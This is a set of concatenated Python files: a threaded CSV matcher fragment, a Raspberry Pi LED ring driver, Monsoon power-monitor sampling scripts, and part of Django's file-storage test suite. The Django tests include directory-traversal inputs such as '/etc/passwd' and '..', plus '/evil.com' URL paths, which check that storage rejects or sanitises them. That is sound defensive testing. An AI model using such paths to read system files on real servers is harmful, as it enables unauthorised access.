                self.result_writer.writerow(self.headers)
            self.result_writer.writerow([result.get(h) for h in self.headers])
        finally:
            self.lock.release()
    def finalize(self):
        """Close the output file, if any row was ever written."""
        self.lock.acquire()
        try:
            if self.result_writer is not None:
                self.result_fh.close()
        finally:
            self.lock.release()
    def match_row(self, row):
        """Scan one row's cells for matcher hits and record each distinct match."""
        matches = defaultdict(list)
        for key, text in row.items():
            norm = normalize_value(text)
            if norm is None:
                continue
            for (_, match) in self.matcher.iter(norm):
                matches[match].append(key)
        for match, fields in matches.items():
            result = OrderedDict(row.items())
            result['_match_name'] = match
            result['_match_field'] = ', '.join(fields)
            self.write_result(result)
            self.match_count += 1
    def handle_row(self):
        """Worker loop: consume queued rows until the process exits."""
        while True:
            item = self.queue.get()
            self.match_row(item)
            self.queue.task_done()
    def process(self):
        """Fan rows out to daemon worker threads and wait for the queue to drain."""
        num_threads = multiprocessing.cpu_count()
        log.info("Process [%s threads]: %s", num_threads, self.base_name)
        for i in range(num_threads):
            thread = Thread(target=self.handle_row)
            thread.daemon = True
            thread.start()
        for count, row in enumerate(self.rows()):
            self.queue.put(row)
            if count % 10000 == 0 and count > 0:
                log.info("[%s] done: %s rows, %s matches, %d queued",
                         self.base_name, count, self.match_count,
                         self.queue.qsize())
        self.queue.join()
        self.finalize()
|
pixels.py |
import apa102
import time
import threading
from gpiozero import LED
try:
import queue as Queue
except ImportError:
import Queue as Queue
from alexa_led_pattern import AlexaLedPattern
from google_home_led_pattern import GoogleHomeLedPattern
class Pixels:
    """Drive a 12-LED APA102 ring through a single background worker thread.
    Public methods enqueue pattern callables; ``_run`` executes them one at a
    time, cancelling the currently running pattern first via ``pattern.stop``.
    """
    PIXELS_N = 12  # number of LEDs on the ring
    def __init__(self, pattern=GoogleHomeLedPattern):
        # ``pattern`` is a class; instantiate it with our show() as renderer.
        self.pattern = pattern(show=self.show)
        self.dev = apa102.APA102(num_led=self.PIXELS_N)
        # GPIO 5 powers the LED ring; it must be on before any show() call.
        self.power = LED(5)
        self.power.on()
        self.queue = Queue.Queue()
        self.thread = threading.Thread(target=self._run)
        self.thread.daemon = True
        self.thread.start()
        self.last_direction = None
    def wakeup(self, direction=0):
        """Run the wakeup animation immediately (not queued), remembering ``direction``."""
        self.last_direction = direction
        self.pattern.wakeup(direction)
    def listen(self):
        """Queue the listen animation, reusing the last wakeup direction when known."""
        if self.last_direction:
            def f():
                self.pattern.wakeup(self.last_direction)
            self.put(f)
        else:
            self.put(self.pattern.listen)
    def think(self):
        """Queue the 'thinking' animation."""
        self.put(self.pattern.think)
    def speak(self):
        """Queue the 'speaking' animation."""
        self.put(self.pattern.speak)
    def off(self):
        """Queue the off pattern twice (with a pause) to make sure the ring goes dark."""
        self.put(self.pattern.off)
        time.sleep(.5)
        self.put(self.pattern.off)
    def put(self, func):
        """Interrupt any running pattern and enqueue ``func`` for the worker."""
        self.pattern.stop = True
        self.queue.put(func)
    def _run(self):
        # Worker loop: execute queued pattern callables forever.
        while True:
            func = self.queue.get()
            self.pattern.stop = False
            func()
    def show(self, data):
        """Push ``data`` to the strip; 4 bytes per pixel, RGB at offsets 1-3.
        The byte at offset 4*i is skipped — presumably brightness; TODO confirm
        against the pattern implementations.
        """
        for i in range(self.PIXELS_N):
            self.dev.set_pixel(i, int(data[4*i + 1]), int(data[4*i + 2]), int(data[4*i + 3]))
        self.dev.show()
# Module-level singleton: importing this module powers the ring and starts the
# worker thread as a side effect.
pixels = Pixels()
if __name__ == '__main__':
    # Demo: cycle wakeup -> think -> speak -> off until Ctrl-C.
    while True:
        try:
            pixels.wakeup()
            time.sleep(3)
            pixels.think()
            time.sleep(3)
            pixels.speak()
            time.sleep(6)
            pixels.off()
            time.sleep(3)
        except KeyboardInterrupt:
            break
    # Make sure the LEDs are dark before exiting.
    pixels.off()
    time.sleep(1)
|
Main.py | from multiprocessing import Process
import LVPM
import sampleEngine
import Operations as op
import HVPM
import pmapi
def testHVPM(serialno=None,Protocol=pmapi.USB_protocol()):
    """Run a 20-second sampling example on an HVPM power monitor.
    Args:
        serialno: serial number of the unit to open (None = first found).
        Protocol: backend protocol instance used to talk to the device.
    Returns:
        None; samples go to 'HV Main Example.csv' and the console.
    """
    HVMON = HVPM.Monsoon()
    HVMON.setup_usb(serialno,Protocol)
    print("HVPM Serial Number: " + repr(HVMON.getSerialNumber()))
    HVMON.fillStatusPacket()
    HVMON.setVout(3)
    HVengine = sampleEngine.SampleEngine(HVMON)
    HVengine.enableCSVOutput("HV Main Example.csv")
    HVengine.ConsoleOutput(True)
    numSamples=sampleEngine.triggers.SAMPLECOUNT_INFINITE #Don't stop based on sample count, continue until the trigger conditions have been satisfied.
    HVengine.setStartTrigger(sampleEngine.triggers.GREATER_THAN,0) #Start when we exceed 0 s
    HVengine.setStopTrigger(sampleEngine.triggers.GREATER_THAN,20) #Stop when we exceed 20 s.
    HVengine.setTriggerChannel(sampleEngine.channels.timeStamp) #Start and stop judged by the timestamp channel.
    HVengine.startSampling(numSamples)
    HVMON.closeDevice();
def testLVPM(serialno=None,Protcol=pmapi.USB_protocol()):
    """Run a multi-stage sampling example on an LVPM power monitor.
    Exercises the main channels, then the USB channels, then every channel,
    and finally retrieves samples directly as a Python list.
    Args:
        serialno: serial number of the unit to open (None = first found).
        Protcol: backend protocol instance. NOTE(review): the name is a typo
            for 'Protocol' but is kept for backward compatibility with any
            keyword callers.
    Returns:
        None; results go to CSV files and the console.
    """
    Mon = LVPM.Monsoon()
    Mon.setup_usb(serialno,Protcol)
    print("LVPM Serial number: " + repr(Mon.getSerialNumber()))
    Mon.fillStatusPacket()
    Mon.setVout(4.5)
    engine = sampleEngine.SampleEngine(Mon)
    engine.enableCSVOutput("Main Example.csv")
    engine.ConsoleOutput(True)
    #test main channels
    numSamples=sampleEngine.triggers.SAMPLECOUNT_INFINITE #Don't stop based on sample count, continue until the trigger conditions have been satisfied.
    engine.setStartTrigger(sampleEngine.triggers.GREATER_THAN,0) #Start when we exceed 0 s
    engine.setStopTrigger(sampleEngine.triggers.GREATER_THAN,5) #Stop when we exceed 5 s.
    engine.setTriggerChannel(sampleEngine.channels.timeStamp) #Start and stop judged by the timestamp channel.
    engine.startSampling(numSamples)
    #Disable Main channels
    engine.disableChannel(sampleEngine.channels.MainCurrent)
    engine.disableChannel(sampleEngine.channels.MainVoltage)
    engine.setStartTrigger(sampleEngine.triggers.GREATER_THAN,0)
    engine.setStopTrigger(sampleEngine.triggers.GREATER_THAN,10) #Stop when we exceed 10 s.
    engine.setTriggerChannel(sampleEngine.channels.timeStamp)
    #Take measurements from the USB Channel
    Mon.setVout(0)
    #Set USB Passthrough mode to 'on,' since it defaults to 'auto' and will turn off when sampling mode begins.
    Mon.setUSBPassthroughMode(op.USB_Passthrough.On)
    #Enable USB channels
    engine.enableChannel(sampleEngine.channels.USBCurrent)
    engine.enableChannel(sampleEngine.channels.USBVoltage)
    engine.enableCSVOutput("USB Test.csv")
    engine.startSampling(5000)
    #Enable every channel, take measurements
    engine.enableChannel(sampleEngine.channels.MainVoltage)
    engine.enableChannel(sampleEngine.channels.MainCurrent)
    #Enable Aux channel
    engine.enableChannel(sampleEngine.channels.AuxCurrent)
    Mon.setVout(2.5)
    engine.enableCSVOutput("All Test.csv")
    engine.startSampling(5000)
    #Enable every channel, take measurements, and retrieve them as a Python list.
    engine.disableCSVOutput()
    engine.startSampling(5000)
    samples = engine.getSamples()
    Mon.closeDevice();
def droppedSamplesTest(ser=None,Prot=pmapi.USB_protocol()):
    """Sample an HVPM unit and report the percentage of dropped samples.
    Args:
        ser: serial number of the unit to open (None = first found).
        Prot: backend protocol instance used to talk to the device.
    Returns:
        None; the result is printed to the console.
    """
    Mon = HVPM.Monsoon()
    Mon.setup_usb(ser,Prot)
    Mon.setVout(4.0)
    engine = sampleEngine.SampleEngine(Mon)
    engine.ConsoleOutput(False)
    # test main channels
    engine.enableChannel(sampleEngine.channels.MainCurrent)
    numSamples = 1000000 # Don't stop based on sample count, continue until the trigger conditions have been satisfied.
    engine.setTriggerChannel(sampleEngine.channels.timeStamp) # Start and stop judged by the timestamp channel.
    engine.startSampling(numSamples)
    samps = engine.getSamples()
    sampleCount = len(samps[0])
    if sampleCount:
        # 100.0 forces float arithmetic so the percentage is not silently
        # truncated to 0 under integer division.
        percent_dropped = 100.0 * engine.dropped / sampleCount
    else:
        # No samples at all: avoid ZeroDivisionError and report 0%.
        percent_dropped = 0.0
    print(repr(ser) + ": SampleCount: " + repr(sampleCount) + " Percent dropped: " + repr(percent_dropped))
def multiHVPMTest(serialnos):
    """Run droppedSamplesTest concurrently, one process per serial number.
    Args:
        serialnos: iterable of device serial numbers.
    Returns:
        None; waits for every worker process to finish.
    """
    procs = []
    for serial in serialnos:
        p = Process(target=droppedSamplesTest,args=(serial,pmapi.CPP_Backend_Protocol()))
        p.start()
        procs.append(p)
    # Join all workers: previously the function returned immediately, letting
    # the parent proceed (module-level code calls testHVPM() right after this)
    # while the workers still held the devices.
    for p in procs:
        p.join()
# Run the dropped-samples test against each attached HVPM unit, then the
# single-device HVPM example on the first available device.
serialnos = [11500, 20019, 20486, 20487]
multiHVPMTest(serialnos)
#testLVPM(60001,pmapi.USB_protocol())
#testHVPM(60000,pmapi.CPP_Backend_Protocol())
testHVPM()
|
tests.py | import os
import shutil
import sys
import tempfile
import threading
import time
import unittest
from datetime import datetime, timedelta
from io import StringIO
from pathlib import Path
from urllib.request import urlopen
from django.core.cache import cache
from django.core.exceptions import SuspiciousFileOperation
from django.core.files.base import ContentFile, File
from django.core.files.storage import (
FileSystemStorage, Storage as BaseStorage, default_storage,
get_storage_class,
)
from django.core.files.uploadedfile import (
InMemoryUploadedFile, SimpleUploadedFile, TemporaryUploadedFile,
)
from django.db.models import FileField
from django.db.models.fields.files import FileDescriptor
from django.test import (
LiveServerTestCase, SimpleTestCase, TestCase, override_settings,
)
from django.test.utils import requires_tz_support
from django.urls import NoReverseMatch, reverse_lazy
from django.utils import timezone
from django.utils._os import symlinks_supported
from .models import (
Storage, callable_storage, temp_storage, temp_storage_location,
)
FILE_SUFFIX_REGEX = '[A-Za-z0-9]{7}'
class GetStorageClassTests(SimpleTestCase):
    """Tests for the get_storage_class() dotted-path import helper."""
    def test_get_filesystem_storage(self):
        """
        get_storage_class returns the class for a storage backend name/path.
        """
        self.assertEqual(
            get_storage_class('django.core.files.storage.FileSystemStorage'),
            FileSystemStorage)
    def test_get_invalid_storage_module(self):
        """
        get_storage_class raises an error if the requested import don't exist.
        """
        with self.assertRaisesMessage(ImportError, "No module named 'storage'"):
            get_storage_class('storage.NonexistentStorage')
    def test_get_nonexistent_storage_class(self):
        """
        get_storage_class raises an error if the requested class don't exist.
        """
        with self.assertRaises(ImportError):
            get_storage_class('django.core.files.storage.NonexistentStorage')
    def test_get_nonexistent_storage_module(self):
        """
        get_storage_class raises an error if the requested module don't exist.
        """
        with self.assertRaisesMessage(ImportError, "No module named 'django.core.files.nonexistent_storage'"):
            get_storage_class('django.core.files.nonexistent_storage.NonexistentStorage')
class FileSystemStorageTests(unittest.TestCase):
    """Tests of FileSystemStorage deconstruction and lazy base_url handling."""
    def test_deconstruction(self):
        # deconstruct() must round-trip the constructor arguments for
        # migration serialization.
        path, args, kwargs = temp_storage.deconstruct()
        self.assertEqual(path, "django.core.files.storage.FileSystemStorage")
        self.assertEqual(args, ())
        self.assertEqual(kwargs, {'location': temp_storage_location})
        kwargs_orig = {
            'location': temp_storage_location,
            'base_url': 'http://myfiles.example.com/'
        }
        storage = FileSystemStorage(**kwargs_orig)
        path, args, kwargs = storage.deconstruct()
        self.assertEqual(kwargs, kwargs_orig)
    def test_lazy_base_url_init(self):
        """
        FileSystemStorage.__init__() shouldn't evaluate base_url.
        """
        storage = FileSystemStorage(base_url=reverse_lazy('app:url'))
        with self.assertRaises(NoReverseMatch):
            storage.url(storage.base_url)
class FileStorageTests(SimpleTestCase):
    """End-to-end tests of a FileSystemStorage backend over real temp dirs."""
    storage_class = FileSystemStorage
    def setUp(self):
        self.temp_dir = tempfile.mkdtemp()
        self.storage = self.storage_class(location=self.temp_dir, base_url='/test_media_url/')
        # Set up a second temporary directory which is ensured to have a mixed
        # case name.
        self.temp_dir2 = tempfile.mkdtemp(suffix='aBc')
    def tearDown(self):
        shutil.rmtree(self.temp_dir)
        shutil.rmtree(self.temp_dir2)
    def test_empty_location(self):
        """
        An empty location falls back to the current working directory.
        """
        storage = self.storage_class(location='')
        self.assertEqual(storage.base_location, '')
        self.assertEqual(storage.location, os.getcwd())
    def test_file_access_options(self):
        """
        Standard file access options are available, and work as expected.
        """
        self.assertFalse(self.storage.exists('storage_test'))
        f = self.storage.open('storage_test', 'w')
        f.write('storage contents')
        f.close()
        self.assertTrue(self.storage.exists('storage_test'))
        f = self.storage.open('storage_test', 'r')
        self.assertEqual(f.read(), 'storage contents')
        f.close()
        self.storage.delete('storage_test')
        self.assertFalse(self.storage.exists('storage_test'))
    def _test_file_time_getter(self, getter):
        # Check for correct behavior under both USE_TZ=True and USE_TZ=False.
        # The tests are similar since they both set up a situation where the
        # system time zone, Django's TIME_ZONE, and UTC are distinct.
        self._test_file_time_getter_tz_handling_on(getter)
        self._test_file_time_getter_tz_handling_off(getter)
    @override_settings(USE_TZ=True, TIME_ZONE='Africa/Algiers')
    def _test_file_time_getter_tz_handling_on(self, getter):
        # Django's TZ (and hence the system TZ) is set to Africa/Algiers which
        # is UTC+1 and has no DST change. We can set the Django TZ to something
        # else so that UTC, Django's TIME_ZONE, and the system timezone are all
        # different.
        now_in_algiers = timezone.make_aware(datetime.now())
        with timezone.override(timezone.get_fixed_timezone(-300)):
            # At this point the system TZ is +1 and the Django TZ
            # is -5. The following will be aware in UTC.
            now = timezone.now()
            self.assertFalse(self.storage.exists('test.file.tz.on'))
            f = ContentFile('custom contents')
            f_name = self.storage.save('test.file.tz.on', f)
            self.addCleanup(self.storage.delete, f_name)
            dt = getter(f_name)
            # dt should be aware, in UTC
            self.assertTrue(timezone.is_aware(dt))
            self.assertEqual(now.tzname(), dt.tzname())
            # The three timezones are indeed distinct.
            naive_now = datetime.now()
            algiers_offset = now_in_algiers.tzinfo.utcoffset(naive_now)
            django_offset = timezone.get_current_timezone().utcoffset(naive_now)
            utc_offset = timezone.utc.utcoffset(naive_now)
            self.assertGreater(algiers_offset, utc_offset)
            self.assertLess(django_offset, utc_offset)
            # dt and now should be the same effective time.
            self.assertLess(abs(dt - now), timedelta(seconds=2))
    @override_settings(USE_TZ=False, TIME_ZONE='Africa/Algiers')
    def _test_file_time_getter_tz_handling_off(self, getter):
        # Django's TZ (and hence the system TZ) is set to Africa/Algiers which
        # is UTC+1 and has no DST change. We can set the Django TZ to something
        # else so that UTC, Django's TIME_ZONE, and the system timezone are all
        # different.
        now_in_algiers = timezone.make_aware(datetime.now())
        with timezone.override(timezone.get_fixed_timezone(-300)):
            # At this point the system TZ is +1 and the Django TZ
            # is -5.
            self.assertFalse(self.storage.exists('test.file.tz.off'))
            f = ContentFile('custom contents')
            f_name = self.storage.save('test.file.tz.off', f)
            self.addCleanup(self.storage.delete, f_name)
            dt = getter(f_name)
            # dt should be naive, in system (+1) TZ
            self.assertTrue(timezone.is_naive(dt))
            # The three timezones are indeed distinct.
            naive_now = datetime.now()
            algiers_offset = now_in_algiers.tzinfo.utcoffset(naive_now)
            django_offset = timezone.get_current_timezone().utcoffset(naive_now)
            utc_offset = timezone.utc.utcoffset(naive_now)
            self.assertGreater(algiers_offset, utc_offset)
            self.assertLess(django_offset, utc_offset)
            # dt and naive_now should be the same effective time.
            self.assertLess(abs(dt - naive_now), timedelta(seconds=2))
            # If we convert dt to an aware object using the Algiers
            # timezone then it should be the same effective time to
            # now_in_algiers.
            _dt = timezone.make_aware(dt, now_in_algiers.tzinfo)
            self.assertLess(abs(_dt - now_in_algiers), timedelta(seconds=2))
    def test_file_get_accessed_time(self):
        """
        File storage returns a Datetime object for the last accessed time of
        a file.
        """
        self.assertFalse(self.storage.exists('test.file'))
        f = ContentFile('custom contents')
        f_name = self.storage.save('test.file', f)
        self.addCleanup(self.storage.delete, f_name)
        atime = self.storage.get_accessed_time(f_name)
        self.assertEqual(atime, datetime.fromtimestamp(os.path.getatime(self.storage.path(f_name))))
        self.assertLess(timezone.now() - self.storage.get_accessed_time(f_name), timedelta(seconds=2))
    @requires_tz_support
    def test_file_get_accessed_time_timezone(self):
        self._test_file_time_getter(self.storage.get_accessed_time)
    def test_file_get_created_time(self):
        """
        File storage returns a datetime for the creation time of a file.
        """
        self.assertFalse(self.storage.exists('test.file'))
        f = ContentFile('custom contents')
        f_name = self.storage.save('test.file', f)
        self.addCleanup(self.storage.delete, f_name)
        ctime = self.storage.get_created_time(f_name)
        self.assertEqual(ctime, datetime.fromtimestamp(os.path.getctime(self.storage.path(f_name))))
        self.assertLess(timezone.now() - self.storage.get_created_time(f_name), timedelta(seconds=2))
    @requires_tz_support
    def test_file_get_created_time_timezone(self):
        self._test_file_time_getter(self.storage.get_created_time)
    def test_file_get_modified_time(self):
        """
        File storage returns a datetime for the last modified time of a file.
        """
        self.assertFalse(self.storage.exists('test.file'))
        f = ContentFile('custom contents')
        f_name = self.storage.save('test.file', f)
        self.addCleanup(self.storage.delete, f_name)
        mtime = self.storage.get_modified_time(f_name)
        self.assertEqual(mtime, datetime.fromtimestamp(os.path.getmtime(self.storage.path(f_name))))
        self.assertLess(timezone.now() - self.storage.get_modified_time(f_name), timedelta(seconds=2))
    @requires_tz_support
    def test_file_get_modified_time_timezone(self):
        self._test_file_time_getter(self.storage.get_modified_time)
    def test_file_save_without_name(self):
        """
        File storage extracts the filename from the content object if no
        name is given explicitly.
        """
        self.assertFalse(self.storage.exists('test.file'))
        f = ContentFile('custom contents')
        f.name = 'test.file'
        storage_f_name = self.storage.save(None, f)
        self.assertEqual(storage_f_name, f.name)
        self.assertTrue(os.path.exists(os.path.join(self.temp_dir, f.name)))
        self.storage.delete(storage_f_name)
    def test_file_save_with_path(self):
        """
        Saving a pathname should create intermediate directories as necessary.
        """
        self.assertFalse(self.storage.exists('path/to'))
        self.storage.save('path/to/test.file', ContentFile('file saved with path'))
        self.assertTrue(self.storage.exists('path/to'))
        with self.storage.open('path/to/test.file') as f:
            self.assertEqual(f.read(), b'file saved with path')
        self.assertTrue(os.path.exists(
            os.path.join(self.temp_dir, 'path', 'to', 'test.file')))
        self.storage.delete('path/to/test.file')
    @unittest.skipUnless(symlinks_supported(), 'Must be able to symlink to run this test.')
    def test_file_save_broken_symlink(self):
        """A new path is created on save when a broken symlink is supplied."""
        nonexistent_file_path = os.path.join(self.temp_dir, 'nonexistent.txt')
        broken_symlink_path = os.path.join(self.temp_dir, 'symlink.txt')
        os.symlink(nonexistent_file_path, broken_symlink_path)
        f = ContentFile('some content')
        f_name = self.storage.save(broken_symlink_path, f)
        self.assertIs(os.path.exists(os.path.join(self.temp_dir, f_name)), True)
    def test_save_doesnt_close(self):
        # save() must leave both temporary and in-memory uploads open so the
        # caller can keep using them.
        with TemporaryUploadedFile('test', 'text/plain', 1, 'utf8') as file:
            file.write(b'1')
            file.seek(0)
            self.assertFalse(file.closed)
            self.storage.save('path/to/test.file', file)
            self.assertFalse(file.closed)
            self.assertFalse(file.file.closed)
        file = InMemoryUploadedFile(StringIO('1'), '', 'test', 'text/plain', 1, 'utf8')
        with file:
            self.assertFalse(file.closed)
            self.storage.save('path/to/test.file', file)
            self.assertFalse(file.closed)
            self.assertFalse(file.file.closed)
    def test_file_path(self):
        """
        File storage returns the full path of a file
        """
        self.assertFalse(self.storage.exists('test.file'))
        f = ContentFile('custom contents')
        f_name = self.storage.save('test.file', f)
        self.assertEqual(self.storage.path(f_name), os.path.join(self.temp_dir, f_name))
        self.storage.delete(f_name)
    def test_file_url(self):
        """
        File storage returns a url to access a given file from the web.
        """
        self.assertEqual(self.storage.url('test.file'), self.storage.base_url + 'test.file')
        # should encode special chars except ~!*()'
        # like encodeURIComponent() JavaScript function do
        self.assertEqual(
            self.storage.url(r"~!*()'@#$%^&*abc`+ =.file"),
            "/test_media_url/~!*()'%40%23%24%25%5E%26*abc%60%2B%20%3D.file"
        )
        self.assertEqual(self.storage.url("ab\0c"), "/test_media_url/ab%00c")
        # should translate os path separator(s) to the url path separator
        self.assertEqual(self.storage.url("""a/b\\c.file"""), "/test_media_url/a/b/c.file")
        # #25905: remove leading slashes from file names to prevent unsafe url output
        self.assertEqual(self.storage.url("/evil.com"), "/test_media_url/evil.com")
        self.assertEqual(self.storage.url(r"\evil.com"), "/test_media_url/evil.com")
        self.assertEqual(self.storage.url("///evil.com"), "/test_media_url/evil.com")
        self.assertEqual(self.storage.url(r"\\\evil.com"), "/test_media_url/evil.com")
        self.assertEqual(self.storage.url(None), "/test_media_url/")
    def test_base_url(self):
        """
        File storage returns a url even when its base_url is unset or modified.
        """
        self.storage.base_url = None
        with self.assertRaises(ValueError):
            self.storage.url('test.file')
        # #22717: missing ending slash in base_url should be auto-corrected
        storage = self.storage_class(location=self.temp_dir, base_url='/no_ending_slash')
        self.assertEqual(
            storage.url('test.file'),
            '%s%s' % (storage.base_url, 'test.file')
        )
    def test_listdir(self):
        """
        File storage returns a tuple containing directories and files.
        """
        self.assertFalse(self.storage.exists('storage_test_1'))
        self.assertFalse(self.storage.exists('storage_test_2'))
        self.assertFalse(self.storage.exists('storage_dir_1'))
        self.storage.save('storage_test_1', ContentFile('custom content'))
        self.storage.save('storage_test_2', ContentFile('custom content'))
        os.mkdir(os.path.join(self.temp_dir, 'storage_dir_1'))
        self.addCleanup(self.storage.delete, 'storage_test_1')
        self.addCleanup(self.storage.delete, 'storage_test_2')
        # Both str and Path arguments must be accepted.
        for directory in ('', Path('')):
            with self.subTest(directory=directory):
                dirs, files = self.storage.listdir(directory)
                self.assertEqual(set(dirs), {'storage_dir_1'})
                self.assertEqual(set(files), {'storage_test_1', 'storage_test_2'})
    def test_file_storage_prevents_directory_traversal(self):
        """
        File storage prevents directory traversal (files can only be accessed if
        they're below the storage location).
        """
        with self.assertRaises(SuspiciousFileOperation):
            self.storage.exists('..')
        with self.assertRaises(SuspiciousFileOperation):
            self.storage.exists('/etc/passwd')
    def test_file_storage_preserves_filename_case(self):
        """The storage backend should preserve case of filenames."""
        # Create a storage backend associated with the mixed case name
        # directory.
        other_temp_storage = self.storage_class(location=self.temp_dir2)
        # Ask that storage backend to store a file with a mixed case filename.
        mixed_case = 'CaSe_SeNsItIvE'
        file = other_temp_storage.open(mixed_case, 'w')
        file.write('storage contents')
        file.close()
        self.assertEqual(os.path.join(self.temp_dir2, mixed_case), other_temp_storage.path(mixed_case))
        other_temp_storage.delete(mixed_case)
    def test_makedirs_race_handling(self):
        """
        File storage should be robust against directory creation race conditions.
        """
        real_makedirs = os.makedirs
        # Monkey-patch os.makedirs, to simulate a normal call, a raced call,
        # and an error.
        def fake_makedirs(path, mode=0o777, exist_ok=False):
            if path == os.path.join(self.temp_dir, 'normal'):
                real_makedirs(path, mode, exist_ok)
            elif path == os.path.join(self.temp_dir, 'raced'):
                real_makedirs(path, mode, exist_ok)
                if not exist_ok:
                    raise FileExistsError()
            elif path == os.path.join(self.temp_dir, 'error'):
                raise PermissionError()
            else:
                self.fail('unexpected argument %r' % path)
        try:
            os.makedirs = fake_makedirs
            self.storage.save('normal/test.file', ContentFile('saved normally'))
            with self.storage.open('normal/test.file') as f:
                self.assertEqual(f.read(), b'saved normally')
            self.storage.save('raced/test.file', ContentFile('saved with race'))
            with self.storage.open('raced/test.file') as f:
                self.assertEqual(f.read(), b'saved with race')
            # Exceptions aside from FileExistsError are raised.
            with self.assertRaises(PermissionError):
                self.storage.save('error/test.file', ContentFile('not saved'))
        finally:
            os.makedirs = real_makedirs
    def test_remove_race_handling(self):
        """
        File storage should be robust against file removal race conditions.
        """
        real_remove = os.remove
        # Monkey-patch os.remove, to simulate a normal call, a raced call,
        # and an error.
        def fake_remove(path):
            if path == os.path.join(self.temp_dir, 'normal.file'):
                real_remove(path)
            elif path == os.path.join(self.temp_dir, 'raced.file'):
                real_remove(path)
                raise FileNotFoundError()
            elif path == os.path.join(self.temp_dir, 'error.file'):
                raise PermissionError()
            else:
                self.fail('unexpected argument %r' % path)
        try:
            os.remove = fake_remove
            self.storage.save('normal.file', ContentFile('delete normally'))
            self.storage.delete('normal.file')
            self.assertFalse(self.storage.exists('normal.file'))
            self.storage.save('raced.file', ContentFile('delete with race'))
            self.storage.delete('raced.file')
            self.assertFalse(self.storage.exists('normal.file'))
            # Exceptions aside from FileNotFoundError are raised.
            self.storage.save('error.file', ContentFile('delete with error'))
            with self.assertRaises(PermissionError):
                self.storage.delete('error.file')
        finally:
            os.remove = real_remove
    def test_file_chunks_error(self):
        """
        Test behavior when file.chunks() is raising an error
        """
        f1 = ContentFile('chunks fails')
        def failing_chunks():
            raise OSError
        f1.chunks = failing_chunks
        with self.assertRaises(OSError):
            self.storage.save('error.file', f1)
    def test_delete_no_name(self):
        """
        Calling delete with an empty name should not try to remove the base
        storage directory, but fail loudly (#20660).
        """
        msg = 'The name must be given to delete().'
        with self.assertRaisesMessage(ValueError, msg):
            self.storage.delete(None)
        with self.assertRaisesMessage(ValueError, msg):
            self.storage.delete('')
    def test_delete_deletes_directories(self):
        tmp_dir = tempfile.mkdtemp(dir=self.storage.location)
        self.storage.delete(tmp_dir)
        self.assertFalse(os.path.exists(tmp_dir))
    @override_settings(
        MEDIA_ROOT='media_root',
        MEDIA_URL='media_url/',
        FILE_UPLOAD_PERMISSIONS=0o777,
        FILE_UPLOAD_DIRECTORY_PERMISSIONS=0o777,
    )
    def test_setting_changed(self):
        """
        Properties using settings values as defaults should be updated on
        referenced settings change while specified values should be unchanged.
        """
        storage = self.storage_class(
            location='explicit_location',
            base_url='explicit_base_url/',
            file_permissions_mode=0o666,
            directory_permissions_mode=0o666,
        )
        defaults_storage = self.storage_class()
        settings = {
            'MEDIA_ROOT': 'overridden_media_root',
            'MEDIA_URL': '/overridden_media_url/',
            'FILE_UPLOAD_PERMISSIONS': 0o333,
            'FILE_UPLOAD_DIRECTORY_PERMISSIONS': 0o333,
        }
        with self.settings(**settings):
            self.assertEqual(storage.base_location, 'explicit_location')
            self.assertIn('explicit_location', storage.location)
            self.assertEqual(storage.base_url, 'explicit_base_url/')
            self.assertEqual(storage.file_permissions_mode, 0o666)
            self.assertEqual(storage.directory_permissions_mode, 0o666)
            self.assertEqual(defaults_storage.base_location, settings['MEDIA_ROOT'])
            self.assertIn(settings['MEDIA_ROOT'], defaults_storage.location)
            self.assertEqual(defaults_storage.base_url, settings['MEDIA_URL'])
            self.assertEqual(defaults_storage.file_permissions_mode, settings['FILE_UPLOAD_PERMISSIONS'])
            self.assertEqual(
                defaults_storage.directory_permissions_mode, settings['FILE_UPLOAD_DIRECTORY_PERMISSIONS']
            )
    def test_file_methods_pathlib_path(self):
        # All basic storage methods must accept pathlib.Path arguments.
        p = Path('test.file')
        self.assertFalse(self.storage.exists(p))
        f = ContentFile('custom contents')
        f_name = self.storage.save(p, f)
        # Storage basic methods.
        self.assertEqual(self.storage.path(p), os.path.join(self.temp_dir, p))
        self.assertEqual(self.storage.size(p), 15)
        self.assertEqual(self.storage.url(p), self.storage.base_url + f_name)
        with self.storage.open(p) as f:
            self.assertEqual(f.read(), b'custom contents')
        self.addCleanup(self.storage.delete, p)
class CustomStorage(FileSystemStorage):
    def get_available_name(self, name, max_length=None):
        """
        Resolve name collisions by appending '.2', '.3', ... (Trac style)
        instead of the default underscore suffix.
        """
        basename, *ext = os.path.splitext(name)
        candidate = name
        counter = 2
        while self.exists(candidate):
            candidate = ''.join([basename, '.', str(counter)] + ext)
            counter += 1
        return candidate
class CustomStorageTests(FileStorageTests):
    """Rerun the FileStorageTests suite against CustomStorage."""
    storage_class = CustomStorage
    def test_custom_get_available_name(self):
        # Second save of the same name must get the '.2' suffix, not '_xxxxxxx'.
        first = self.storage.save('custom_storage', ContentFile('custom contents'))
        self.assertEqual(first, 'custom_storage')
        second = self.storage.save('custom_storage', ContentFile('more contents'))
        self.assertEqual(second, 'custom_storage.2')
        self.storage.delete(first)
        self.storage.delete(second)
class OverwritingStorage(FileSystemStorage):
    """
    Overwrite existing files instead of appending a suffix to generate an
    unused name.
    """
    # Mask out O_EXCL so os.open() doesn't raise OSError if the file exists.
    OS_OPEN_FLAGS = FileSystemStorage.OS_OPEN_FLAGS & ~os.O_EXCL
    def get_available_name(self, name, max_length=None):
        """Override the effort to find an unused name; always reuse ``name``."""
        return name
class OverwritingStorageTests(FileStorageTests):
    """Rerun the FileStorageTests suite against OverwritingStorage."""
    storage_class = OverwritingStorage
    def test_save_overwrite_behavior(self):
        """Saving to same file name twice overwrites the first file."""
        name = 'test.file'
        self.assertFalse(self.storage.exists(name))
        content_1 = b'content one'
        content_2 = b'second content'
        f_1 = ContentFile(content_1)
        f_2 = ContentFile(content_2)
        stored_name_1 = self.storage.save(name, f_1)
        try:
            self.assertEqual(stored_name_1, name)
            self.assertTrue(self.storage.exists(name))
            self.assertTrue(os.path.exists(os.path.join(self.temp_dir, name)))
            with self.storage.open(name) as fp:
                self.assertEqual(fp.read(), content_1)
            stored_name_2 = self.storage.save(name, f_2)
            self.assertEqual(stored_name_2, name)
            self.assertTrue(self.storage.exists(name))
            self.assertTrue(os.path.exists(os.path.join(self.temp_dir, name)))
            with self.storage.open(name) as fp:
                self.assertEqual(fp.read(), content_2)
        finally:
            self.storage.delete(name)
class DiscardingFalseContentStorage(FileSystemStorage):
    def _save(self, name, content):
        """Skip writing entirely when ``content`` is falsy; delegate otherwise."""
        if not content:
            return ''
        return super()._save(name, content)
class DiscardingFalseContentStorageTests(FileStorageTests):
